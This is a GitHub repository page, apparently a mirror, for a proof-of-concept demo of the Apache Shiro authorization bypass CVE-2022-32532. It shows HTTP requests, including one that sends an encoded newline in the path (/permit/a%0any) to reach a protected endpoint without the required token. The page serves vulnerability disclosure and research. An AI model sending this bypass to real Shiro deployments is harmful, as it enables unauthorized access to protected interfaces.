mrcoolzh / CVE-2022-32532

Apache Shiro CVE-2022-32532

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-32532

about

This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).

In fact, there are more ways to exploit it, as long as developers use RegExPatternMatcher, there will be a possible bypass vulnerability.

introduce

Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under /permit

This request can succeed

GET /permit/any HTTP/1.1
Token: 4ra1n

Access is not allowed when there is no token request header

GET /permit/any HTTP/1.1

It can be bypassed in a simple way in special but common configurations

GET /permit/a%0any HTTP/1.1

reference

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

https://xz.aliyun.com/t/11501

This vulnerability is similar to Spring-Security CVE-2022-22978

Thanks to bdemers (Apache Shiro PMC) and chybeta (Security Researcher)

About

Apache Shiro CVE-2022-32532


Languages

Language:Java 100.0%